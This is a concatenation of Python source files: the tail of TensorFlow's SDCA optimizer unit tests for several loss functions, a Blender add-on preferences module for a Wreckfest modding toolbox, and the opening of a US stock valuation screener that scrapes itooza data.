        self.assertAllEqual([0, 0], predicted_labels.eval())
        self.assertAllClose(
            0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testOutOfRangeSparseFeatures(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(0, 0)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, 'indices.*'):
train_op.run()
def testOutOfRangeDenseFeatures(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[1.0, 0.0])
# Replace with a variable of size 1 instead of 2.
variables['dense_features_weights'] = [
tf.compat.v1.Variable(tf.zeros([1], dtype=tf.dtypes.float32))
]
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError,
'More dense features than we have parameters for.*'):
train_op.run()
  def testMissingFeature(self):
    """An example with an empty sparse feature ('age': []) still trains."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
        # Third example has no 'age' feature at all.
        make_example_proto({
            'age': [],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1, 1)
      options = dict(
          symmetric_l2_regularization=1,
          symmetric_l1_regularization=0,
          num_table_shards=1,
          loss_type='logistic_loss')
      lr = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      unregularized_loss = lr.unregularized_loss(examples)
      # With zero weights the logistic loss per example is ln(2).
      self.assertAllClose(0.693147, unregularized_loss.eval())
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()
      self.assertAllClose(
          0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)

  # TODO(katsiaspis): add a test for the case when examples at the end of an
  # epoch are repeated, since example id may be duplicated.
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithLinearLossTest(_SDCAModelTest):
  """SDCA optimizer test class for linear (squared) loss."""

  def testSimple(self):
    """Converges to the closed-form optimum for 2 examples, L2=1."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      predictions = lr.predictions(examples)
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()
      # Predictions should be 2/3 of label due to minimizing regularized loss:
      #   (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2
      self.assertAllClose([-20.0 / 3.0, 28.0 / 3.0],
                          predictions.eval(),
                          rtol=0.005)
      # Approximate gap should be very close to 0.0. (In fact, because the gap
      # is only approximate, it is likely that upon convergence the duality gap
      # can have a tiny negative value).
      self.assertAllClose(0.0, lr.approximate_duality_gap().eval(), atol=1e-2)

  def testL2Regularization(self):
    """Stronger L2 (=16) shrinks predictions to 1/5 of the labels."""
    # Setup test data
    example_protos = [
        # 2 identical examples
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0),
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0),
        # 2 more identical examples
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0),
    ]
    example_weights = [1.0, 1.0, 1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=16,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      predictions = lr.predictions(examples)
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()
      # Predictions should be 1/5 of label due to minimizing regularized loss:
      #   (label - 2 * weight)^2 + L2 * 16 * weight^2
      optimal1 = -10.0 / 5.0
      optimal2 = 14.0 / 5.0
      self.assertAllClose([optimal1, optimal1, optimal2, optimal2],
                          predictions.eval(),
                          rtol=0.01)

  def testL1Regularization(self):
    """L1 (=4) shifts the squared-loss optimum; checks predictions and loss."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=4.0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      prediction = lr.predictions(examples)
      loss = lr.regularized_loss(examples)
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()
      # Predictions should be -4, 20/3 due to minimizing regularized loss:
      #   (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2 + L1 * 4 * weight
      self.assertAllClose([-4.0, 20.0 / 3.0], prediction.eval(), rtol=0.08)
      # Loss should be the sum of the regularized loss value from above per
      # example after plugging in the optimal weights.
      self.assertAllClose(308.0 / 6.0, loss.eval(), atol=0.01)

  def testFeatureValues(self):
    """Non-unit feature values and example weights scale the optimum."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0, -2.0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0, 2.0),
    ]
    example_weights = [5.0, 3.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      predictions = lr.predictions(examples)
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()
      # There are 4 (sparse) variable weights to be learned. 2 for age and 2
      # for gender. Let w_1, w_2 be age weights, w_3, w_4 be gender weights,
      # y_1, y_2 be the labels for examples 1 and 2 respectively and s_1, s_2
      # the corresponding *example* weights. With the given feature values, the
      # loss function is given by:
      #   s_1/2(y_1 + 2w_1 + 2w_3)^2 + s_2/2(y_2 - 2w_2 - 2w_4)^2
      #   + \lambda/2 (w_1^2 + w_2^2 + w_3^2 + w_4^2). Solving for the optimal,
      # it can be verified that:
      #   w_1* = w_3* = -2.0 s_1 y_1/(\lambda + 8 s_1) and
      #   w_2* = w_4* = 2 \cdot s_2 y_2/(\lambda + 8 s_2). Equivalently, due to
      # regularization and example weights, the predictions are within:
      #   8 \cdot s_i /(\lambda + 8 \cdot s_i) of the labels.
      self.assertAllClose([-10 * 40.0 / 41.0, 14.0 * 24 / 25.0],
                          predictions.eval(),
                          atol=0.01)

  def testDenseFeaturesWithDefaultWeights(self):
    """Dense features with unit example weights reach the analytic optimum."""
    with self._single_threaded_test_session():
      # NOTE(review): the two dense columns use different nesting depths
      # ([[1.0], [0.0]] vs [0.0, 1.0]) — presumably both accepted by the
      # helper; confirm against make_dense_examples_and_variables_dicts.
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0], [0.0]], [0.0, 1.0]],
          weights=[1.0, 1.0],
          labels=[10.0, -5.0])
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      predictions = lr.predictions(examples)
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()
      # The loss function for these particular features is given by:
      #   1/2(label_1-w_1)^2 + 1/2(label_2-w_2)^2 + \lambda/2 (w_1^2 + w_2^2).
      # So, differentiating wrt to w_1, w_2 yields the following optimal values:
      #   w_1* = label_1/(\lambda + 1)= 10/2, w_2* =label_2/(\lambda + 1)= -5/2.
      # In this case the (unnormalized regularized) loss will be:
      #   1/2(10-5)^2 + 1/2(5-5/2)^2 + 1/2(5^2 + (5/2)^2) = 125.0/4. The actual
      # loss should be further normalized by the sum of example weights.
      self.assertAllClose([5.0, -2.5], predictions.eval(), rtol=0.01)
      loss = lr.regularized_loss(examples)
      self.assertAllClose(125.0 / 8.0, loss.eval(), atol=0.01)

  def testDenseFeaturesWithArbitraryWeights(self):
    """Dense features with non-unit example weights reach the analytic optimum."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
          weights=[20.0, 10.0],
          labels=[10.0, -5.0])
      options = dict(
          symmetric_l2_regularization=5.0,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      predictions = lr.predictions(examples)
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()
      # The loss function for these particular features is given by:
      #   1/2 s_1 (label_1-w_1)^2 + 1/2 s_2(label_2-w_2)^2 +
      #   \lambda/2 (w_1^2 + w_2^2) where s_1, s_2 are the *example weights. It
      # turns out that the optimal (variable) weights are given by:
      #   w_1* = label_1 \cdot s_1/(\lambda + s_1)= 8.0 and
      #   w_2* =label_2 \cdot s_2/(\lambda + s_2)= -10/3.
      # In this case the (unnormalized regularized) loss will be:
      #   s_1/2(8-10)^2 + s_2/2(5-10/3)^2 + 5.0/2(8^2 + (10/3)^2) = 2175.0/9.
      # The actual loss should be further normalized by the sum of example
      # weights.
      self.assertAllClose([8.0, -10.0 / 3], predictions.eval(), rtol=0.01)
      loss = lr.regularized_loss(examples)
      self.assertAllClose(2175.0 / 270.0, loss.eval(), atol=0.01)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithHingeLossTest(_SDCAModelTest):
  """SDCA optimizer test class for hinge loss."""

  def testSimple(self):
    """Separable sparse data: zero hinge loss, L2 loss 0.25 at the optimum."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='hinge_loss')
      model = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      # Before minimization, the weights default to zero. There is no loss due
      # to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
      predictions = model.predictions(examples)
      self.assertAllClose([0.0, 0.0], predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(1.0, unregularized_loss.eval())
      self.assertAllClose(1.0, regularized_loss.eval())
      # After minimization, the model separates perfectly the data points.
      # There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
      # (say w3 and w4). Solving the system w1 + w3 = 1.0, w2 + w4 = -1.0 and
      # minimizing wrt to \|\vec{w}\|_2, gives w1=w3=1/2 and w2=w4=-1/2. This
      # gives 0.0 unregularized loss and 0.25 L2 loss.
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()
      binary_predictions = get_binary_predictions_for_hinge(predictions)
      self.assertAllEqual([-1.0, 1.0], predictions.eval())
      self.assertAllEqual([0, 1], binary_predictions.eval())
      self.assertAllClose(0.0, unregularized_loss.eval())
      self.assertAllClose(0.25, regularized_loss.eval(), atol=0.05)

  def testDenseFeaturesPerfectlySeparable(self):
    """Dense data separable with margin >= 1: only L2 loss remains."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[1.0, 1.0], [1.0, -1.0]],
          weights=[1.0, 1.0],
          labels=[1.0, 0.0])
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='hinge_loss')
      model = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      predictions = model.predictions(examples)
      binary_predictions = get_binary_predictions_for_hinge(predictions)
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()
      self.assertAllClose([1.0, -1.0], predictions.eval(), atol=0.05)
      self.assertAllEqual([1, 0], binary_predictions.eval())
      # (1.0, 1.0) and (1.0, -1.0) are perfectly separable by x-axis (that is,
      # the SVM's functional margin >=1), so the unregularized loss is ~0.0.
      # There is only loss due to l2-regularization. For these datapoints, it
      # turns out that w_1~=0.0 and w_2~=1.0 which means that l2 loss is ~0.25.
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(0.0, unregularized_loss.eval(), atol=0.02)
      self.assertAllClose(0.25, regularized_loss.eval(), atol=0.02)

  def testDenseFeaturesSeparableWithinMargins(self):
    """Dense data separable but inside the margin: hinge loss stays positive."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0, 0.5], [1.0, -0.5]]],
          weights=[1.0, 1.0],
          labels=[1.0, 0.0])
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='hinge_loss')
      model = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      predictions = model.predictions(examples)
      binary_predictions = get_binary_predictions_for_hinge(predictions)
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()
      # (1.0, 0.5) and (1.0, -0.5) are separable by x-axis but the datapoints
      # are within the margins so there is unregularized loss (1/2 per
      # example). For these datapoints, optimal weights are w_1~=0.0 and
      # w_2~=1.0 which gives an L2 loss of ~0.25.
      self.assertAllClose([0.5, -0.5], predictions.eval(), rtol=0.05)
      self.assertAllEqual([1, 0], binary_predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(0.5, unregularized_loss.eval(), atol=0.02)
      self.assertAllClose(0.75, regularized_loss.eval(), atol=0.02)

  def testDenseFeaturesWeightedExamples(self):
    """A heavier example pushes the decision boundary toward the lighter one."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0], [1.0]], [[0.5], [-0.5]]],
          weights=[3.0, 1.0],
          labels=[1.0, 0.0])
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='hinge_loss')
      model = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      predictions = model.predictions(examples)
      binary_predictions = get_binary_predictions_for_hinge(predictions)
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()
      # Point (1.0, 0.5) has higher weight than (1.0, -0.5) so the model will
      # try to increase the margin from (1.0, 0.5). Due to regularization,
      # (1.0, -0.5) will be within the margin. For these points and example
      # weights, the optimal weights are w_1~=0.4 and w_2~=1.2 which give an
      # L2 loss of 0.5 * 0.25 * 0.25 * 1.6 = 0.2. The binary predictions will
      # be correct, but the boundary will be much closer to the 2nd point than
      # the first one.
      self.assertAllClose([1.0, -0.2], predictions.eval(), atol=0.05)
      self.assertAllEqual([1, 0], binary_predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(0.2, unregularized_loss.eval(), atol=0.02)
      self.assertAllClose(0.4, regularized_loss.eval(), atol=0.02)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithSmoothHingeLossTest(_SDCAModelTest):
  """SDCA optimizer test class for smooth hinge loss."""

  def testSimple(self):
    """Smooth hinge on separable data converges to w=±1/3 per feature."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='smooth_hinge_loss')
      model = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      # Before minimization, the weights default to zero. There is no loss due
      # to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
      predictions = model.predictions(examples)
      self.assertAllClose([0.0, 0.0], predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(1.0, unregularized_loss.eval())
      self.assertAllClose(1.0, regularized_loss.eval())
      # After minimization, the model separates perfectly the data points.
      # There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
      # (say w3 and w4). The minimization leads to w1=w3=1/3 and w2=w4=-1/3.
      # This gives an unregularized hinge loss of 0.33 and a 0.11 L2 loss.
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()
      binary_predictions = get_binary_predictions_for_hinge(predictions)
      self.assertAllClose([-0.67, 0.67], predictions.eval(), atol=0.05)
      self.assertAllEqual([0, 1], binary_predictions.eval())
      self.assertAllClose(0.33, unregularized_loss.eval(), atol=0.02)
      self.assertAllClose(0.44, regularized_loss.eval(), atol=0.02)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithPoissonLossTest(_SDCAModelTest):
  """SDCA optimizer test class for poisson loss."""

  def testSimple(self):
    """Poisson loss with count labels 0 and 2 reaches the analytic argmin."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 2),
    ]
    example_weights = [100.0, 100.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='poisson_loss')
      model = _SDCAModel(examples, variables, options)
      tf.compat.v1.initializers.global_variables().run()
      # Before minimization, the weights default to zero. There is no loss due
      # to regularization, only unregularized loss which is 1 for each example.
      predictions = model.predictions(examples)
      self.assertAllClose([1.0, 1.0], predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      approximate_duality_gap = model.approximate_duality_gap()
      self.assertAllClose(1.0, unregularized_loss.eval())
      self.assertAllClose(1.0, regularized_loss.eval())
      # There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
      # (say w3 and w4). The minimization leads to:
      #   w1=w3=-1.96487, argmin of 100*(exp(2*w)-2*w*0)+w**2.
      #   w2=w4=0.345708, argmin of 100*(exp(2*w)-2*w*2)+w**2.
      # This gives an unregularized loss of .3167 and .3366 with
      # regularization.
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()
      self.assertAllClose([0.0196, 1.9965], predictions.eval(), atol=1e-4)
      self.assertAllClose(0.3167, unregularized_loss.eval(), atol=1e-4)
      self.assertAllClose(0.3366, regularized_loss.eval(), atol=1e-4)
      self.assertAllClose(0., approximate_duality_gap.eval(), atol=1e-6)
class SdcaFprintTest(_SDCAModelTest):
  """Tests for the SdcaFprint op.

  This is one way of enforcing the platform-agnostic nature of SdcaFprint.
  Basically we are checking against exact values and this test could be running
  across different platforms. Note that it is fine for expected values to
  change in the future, if the implementation of SdcaFprint changes (ie this is
  *not* a frozen test).
  """

  def testFprint(self):
    """Fingerprints of fixed strings must match the pinned 64-bit pairs."""
    with self._single_threaded_test_session():
      in_data = tf.constant(['abc', 'very looooooong string', 'def'])
      out_data = tf.compat.v1.train.sdca_fprint(in_data)
      # Each input string maps to a pair of signed int64 fingerprint halves.
      self.assertAllEqual([[4143508125394299908, -6879828354153669051],
                           [5849691694103072671, -4874542629849009556],
                           [603227410218889250, 8762207001949257490]],
                          self.evaluate(out_data))
class _SparseFeatureColumnTest(TensorFlowTestCase):
  """Tests for _SparseFeatureColumn."""

  def testBasic(self):
    """Indices are exposed as Tensors; feature_values may be None or a list."""
    expected_example_indices = [1, 1, 1, 2]
    expected_feature_indices = [0, 1, 2, 0]
    # With feature_values=None the column stores no values.
    sfc = _SparseFeatureColumn(expected_example_indices,
                               expected_feature_indices, None)
    self.assertIsInstance(sfc.example_indices, tf.Tensor)
    self.assertIsInstance(sfc.feature_indices, tf.Tensor)
    self.assertEqual(sfc.feature_values, None)
    with self.cached_session():
      self.assertAllEqual(expected_example_indices,
                          self.evaluate(sfc.example_indices))
      self.assertAllEqual(expected_feature_indices,
                          self.evaluate(sfc.feature_indices))
    # When values are supplied they round-trip through the column unchanged.
    expected_feature_values = [1.0, 2.0, 3.0, 4.0]
    sfc = _SparseFeatureColumn([1, 1, 1, 2], [0, 1, 2, 0],
                               expected_feature_values)
    with self.cached_session():
      self.assertAllEqual(expected_feature_values,
                          self.evaluate(sfc.feature_values))
# Script entry point: run every test case defined in this module.
if __name__ == '__main__':
  googletest.main()
|
preferences.py | """Addon preferences that are saved inbetween sesions."""
import bpy
import os.path
import subprocess
import threading
from os import path
def preference_save(self, context):
    """Property-update callback: persist user preferences to disk.

    Used as the ``update=`` callback of add-on properties so any change is
    saved immediately via Blender's ``wm.save_userpref`` operator.
    """
    bpy.ops.wm.save_userpref()
class WreckfestPanelContext(bpy.types.PropertyGroup):
    """Properties that can be changed in panel"""

    # Which toolbox sub-panel is active. Each item is
    # (identifier, label, tooltip, icon, unique number).
    panel_enums: bpy.props.EnumProperty(
        items=(
            ("CUSTOM_PARTS", "Custom Parts", "Manage custom parts", "PRESET", 0),
            ("EXPORT", "Export", "Export scene tools", "EXPORT", 1),
            # NOTE(review): number jumps from 1 to 3 — presumably a removed
            # item; kept to preserve saved enum values.
            ("SETTINGS", "Addon Settings", "Addon Settings", "PREFERENCES", 3),
        ),
        name="Addon Panels",
    )
class WreckfestToolboxAddonPreference(bpy.types.AddonPreferences):
    """Persistent add-on preferences for the Wreckfest toolbox.

    Holds the Wreckfest install path, export options, and a cached enum of
    physical materials discovered from the game's ``.suse`` files.
    """
    bl_idname = "wreckfest_toolbox"

    # Verbosity levels offered for export messages.
    wreckfest_message_level = [
        ("VERBOSE", "Verbose", ""),
        ("WARNING", "Warning", ""),
        ("ERROR", "Error", "")
    ]

    # Cached enum items. NOTE(review): this is a class-level mutable list,
    # shared by all instances — acceptable here since Blender keeps a single
    # preferences instance per add-on.
    physical_materials = [("default", "default", "")]

    def get_physical_materials(self, context):
        """Enum items callback: list physical materials from the game install.

        Scans ``<wf_path>\\data\\scene\\surface`` for ``.suse`` files and
        caches one enum item per material. Falls back to a single "default"
        entry when the path is unset or the surface folder is missing.
        """
        # Already populated beyond the fallback entry: reuse the cache.
        if len(self.physical_materials) > 1:
            return self.physical_materials
        self.physical_materials.clear()
        # BUG FIX: a Blender StringProperty is never None — an unset path is
        # the empty string. The old `is None` check could never trigger, so an
        # empty path fell through to os.listdir and raised.
        if not self.wf_path:
            self.physical_materials.append(("default", "default", ""))
            return self.physical_materials
        directory = self.wf_path + "\\data\\scene\\surface\\"
        # Check if the default physical material exists; if not, the install
        # path is wrong or incomplete, so fall back to the default entry.
        if not path.exists(directory + "default.suse"):
            self.physical_materials.append(("default", "default", ""))
            return self.physical_materials
        # Build one enum item per .suse file found in the surface folder.
        for filename in os.listdir(directory):
            if filename.endswith(".suse"):
                material_name = os.path.splitext(os.path.basename(filename))[0]
                self.physical_materials.append(
                    (material_name, material_name, material_name))
        return self.physical_materials

    # Wreckfest install path; saving preferences on every change.
    wf_path: bpy.props.StringProperty(
        name="Wreckfest Path",
        subtype="DIR_PATH",
        default=R"C:\Program Files (x86)\Steam\steamapps\common\Wreckfest",
        update=preference_save,
    )

    # Build assets tool path, relative to wf_path.
    wf_build_asset_subpath: bpy.props.StringProperty(
        name="Wreckfest Build Asset Path",
        default=R"\tools\build_asset.bat"
    )

    wf_physical_material_list: bpy.props.EnumProperty(
        name="Wreckfest Physical Material List",
        items=get_physical_materials,
        default=None
    )
    # TODO : Make this update function work
    # update=bpy.ops.wftb.set_physical_material()

    export_message_level: bpy.props.EnumProperty(
        name="Export Message Level",
        items=wreckfest_message_level,
    )

    apply_modifiers: bpy.props.BoolProperty(
        name="Apply Modifier",
        default=True,
        description="Apply modifier to the exported models"
    )

    auto_split_edge: bpy.props.BoolProperty(
        name="Split Edges",
        default=True,
        description="Add a Split edge modifier for sharp edges (marked) on export"
    )

    build_after_export: bpy.props.BoolProperty(
        name="Build after export",
        description="Launch the Build Asset Script in background "
                    "for the newly exported .bgo3 file once the export is done",
        default=True
    )

    def draw(self, context):
        """Draw the preferences UI: a single row with the install path."""
        row = self.layout.row(align=True)
        row.prop(self, "wf_path")

    @staticmethod
    def popen_and_call(on_exit, popen_args):
        """
        Runs the given args in a subprocess.Popen, and then calls the function
        on_exit when the subprocess completes.

        on_exit is a callable object, and popen_args is a list/tuple of args
        that would give to subprocess.Popen. Returns the started thread
        immediately; the caller is not blocked.
        """
        def run_in_thread(on_exit_event, popen_args_list):
            # NOTE: shell=True is kept for .bat support; popen_args must come
            # from trusted add-on configuration, never user-supplied text.
            proc = subprocess.Popen(popen_args_list, shell=True)
            proc.wait()
            on_exit_event()
            return

        thread = threading.Thread(target=run_in_thread, args=(on_exit, popen_args))
        thread.start()
        # returns immediately after the thread starts
        return thread
|
us_run.py | # -*- coding: utf-8 -*-
import os
import pandas as pd
import re
import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
import csv
from datetime import datetime
import time
import sys
from multiprocessing import Process
import url_handler
import data_collector
import valuator
# Timestamp captured once at import time; used to build dated output folders.
now = datetime.now()
# Required rate of return fed into the S-RIM valuation — presumably a
# percentage; TODO confirm units against valuator.s_rim_calculator_us.
expected_income_ratio = 8.12
stock_code_file = "./ual.csv"  # Test data
# Column headers for the result DataFrame/CSV produced by the screener.
columnlist = ['code', 'name', 'price', 'EV/CF', 'EPS', 'PBR', 'dividend', 'ROE%', 'ROA(8)%', 'ROIC(8)%', 'FCFA(8)%', 'P_MM', 'EBIT/EV', 'GPA', 'ROIC%', 'S-RIM\nprice', 'S-RIM\nmargin', 'Templeton\nprice', 'Templeton\nrank', 'P_FS', 'STA', 'SNOA', 'Moat']
def us_run(us_codes, proc_num, list_chunk=300, login_id="", login_passwd="", result_file_header="./result_data/us_choosen_"):
    """Value a list of US stocks scraped from itooza and write results to CSV.

    For every ``(code, name)`` pair in *us_codes*, raw data is fetched via
    ``data_collector``, valuation metrics (S-RIM, Templeton, F-score, moat,
    quality factors) are computed via ``valuator``, and one row per stock is
    appended to ``<result_file_header><YYYYMMDD>_<proc_num>.csv``.  Stocks
    that raise during processing are recorded in a per-process
    ``revisit_list_*.csv``.

    Arguments:
        us_codes -- iterable of (stock_code, stock_name) pairs
        proc_num -- worker-process index, used in output file names
        list_chunk -- unused here; kept for call-site compatibility
        login_id, login_passwd -- itooza credentials for the collector
        result_file_header -- prefix of the per-process result CSV
    """
    print("proc_num = {}".format(proc_num))
    # Directory holding today's raw scrape snapshots.
    data_dir = "./itooza/us/" + now.strftime("%Y%m%d") + "/"
    try:
        os.makedirs(data_dir)
        print("Directory ", data_dir, " Created ")
    except FileExistsError:
        print("Directory ", data_dir, " Already exists")
    stock_code_name_dict = {}
    s_rim_buy = []
    templeton_buy = []
    alldfcontents = []       # one completed row per successfully-valued stock
    dfcontents = []
    all_revisit_contents = []
    revisit_contents = []
    for us_code in us_codes:
        try:
            stock_code = us_code[0]
            stock_code_name_dict[stock_code] = us_code[1]
            print("\n\n\nus_code = {}, stock_name = {}".format(stock_code, us_code[1]))
            s_rim_price = 0
            templeton_price = 0
            df_investing, df_financial, current_price, ev = data_collector.read_data_from_itooza_us(stock_code, login_id, login_passwd)
            print(df_investing)
            print(df_financial)
            ev_cf_ratio = valuator.calculate_ev_cf_ratio(ev, df_financial)
            print("EV/CashFlow = {}".format(ev_cf_ratio))
            sta, snoa = valuator.calculate_sta_snoa_probm_us(df_financial)
            stock_name_to_print = "{}, {}".format(stock_code, stock_code_name_dict[stock_code])
            # S-RIM valuation: buy signal when fair value exceeds market price.
